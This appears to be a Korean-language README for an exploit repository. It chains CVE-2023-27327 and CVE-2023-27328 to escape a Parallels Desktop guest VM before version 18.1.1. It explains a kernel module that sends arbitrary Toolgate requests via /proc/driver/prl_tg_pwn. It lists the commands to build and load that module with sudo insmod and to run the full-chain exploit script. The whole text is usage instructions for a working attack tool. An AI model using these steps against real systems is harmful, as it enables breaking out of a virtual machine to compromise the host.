
CVE-2023-27327 및 CVE-2023-27328용 익스플로잇
이 저장소에는 CVE-2023-27327 및 CVE-2023-27328에 대한 익스플로잇이 포함되어 있으며, 두 취약점을 함께 사용하여 Parallels Desktop 18.1.1 이전 버전의 Parallels Desktop 가상 머신에서 탈출할 수 있습니다.
또한 필수 커널 모듈의 코드가 prl_mod에 포함되어 있으며, 이를 사용하여 /proc/driver/prl_tg_pwn에 생성된 proc 항목을 통해 사용자 공간에서 임의의 Toolgate 요청(< opcode 0x8000)을 보낼 수 있습니다.
커널 모듈을 빌드하고 로드합니다:
cd prl_mod
make -f Makefile.kmods
sudo insmod ./prl_tg_pwn/Toolgate/Guest/Linux/prl_tg/prl_tg_pwn.ko
익스플로잇을 실행합니다:
cd ..
pip install -r requirements.txt
./3_full_chain.py